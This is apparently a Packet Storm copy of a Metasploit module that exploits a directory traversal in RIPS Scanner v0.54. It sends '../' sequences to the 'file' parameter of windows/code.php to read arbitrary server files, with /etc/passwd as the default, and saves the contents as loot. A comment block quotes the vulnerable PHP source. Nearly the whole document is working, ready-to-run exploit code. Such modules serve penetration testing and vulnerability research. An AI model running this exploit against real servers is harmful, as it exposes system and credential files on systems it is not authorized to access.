This Metasploit module exploits a directory traversal vulnerability in the RIPS Scanner v0.54, allowing to read arbitrary files with the web server privileges.
64c5fa4a4c496821d7e786dd634977b36db94e56b76ac0110a7c936a85a84f1f##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Auxiliary
include Msf::Auxiliary::Report
include Msf::Exploit::Remote::HttpClient
include Msf::Auxiliary::Scanner
def initialize(info = {})
super(update_info(info,
'Name' => 'RIPS Scanner Directory Traversal',
'Description' => %q{
This module exploits a directory traversal vulnerability in the RIPS Scanner v0.54,
allowing to read arbitrary files with the web server privileges.
},
'References' =>
[
['EDB', '18660'],
['URL', 'http://codesec.blogspot.com/2015/03/rips-scanner-v-054-local-file-include.html']
],
'Author' =>
[
'localh0t', # Vulnerability discovery
'Roberto Soares Espreto <robertoespreto[at]gmail.com>' # Metasploit module
],
'License' => MSF_LICENSE
))
register_options(
[
Opt::RPORT(80),
OptString.new('TARGETURI', [ true, "The URI path to the web application", "/rips/"]),
OptString.new('FILEPATH', [true, "The path to the file to read", "/etc/passwd"]),
OptInt.new('DEPTH', [ true, 'Traversal Depth (to reach the root folder)', 5 ])
])
end
def run_host(ip)
traversal = "../" * datastore['DEPTH']
filename = datastore['FILEPATH']
filename = filename[1, filename.length] if filename =~ /^\//
res = send_request_cgi({
'method' => 'GET',
'uri' => normalize_uri(target_uri.path, 'windows', 'code.php'),
'vars_get' =>
{
'file' => "#{traversal}#{filename}"
}
})
if res &&
res.code == 200 &&
res.headers.include?('Set-Cookie') &&
res.body.length > 304
html = Nokogiri::HTML(res.body)
html_clean = html.search('.codeline').text
print_line("#{html_clean}")
fname = datastore['FILEPATH']
path = store_loot(
'rips.traversal',
'text/plain',
ip,
html_clean,
fname
)
print_good("File saved in: #{path}")
else
print_error("Nothing was downloaded")
end
end
end
=begin
102 $file = $_GET['file'];
103 $marklines = explode(',', $_GET['lines']);
104
105
106 if(!empty($file))
107 {
108 $lines = file($file);
109
110 // place line numbers in extra table for more elegant copy/paste without line numbers
111 echo '<tr><td><table>';
112 for($i=1, $max=count($lines); $i<=$max;$i++)
113 echo "<tr><td class=\"linenrcolumn\"><span class=\"linenr\">$i</span><A id='".($i+2).'\'></A></td></tr>';
114 echo '</table></td><td id="codeonly"><table id="codetable" width="100%">';
115
116 $in_comment = false;
117 for($i=0; $i<$max; $i++)
118 {
119 $in_comment = highlightline($lines[$i], $i+1, $marklines, $in_comment);
120 }
121 }
=end
© 2024 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed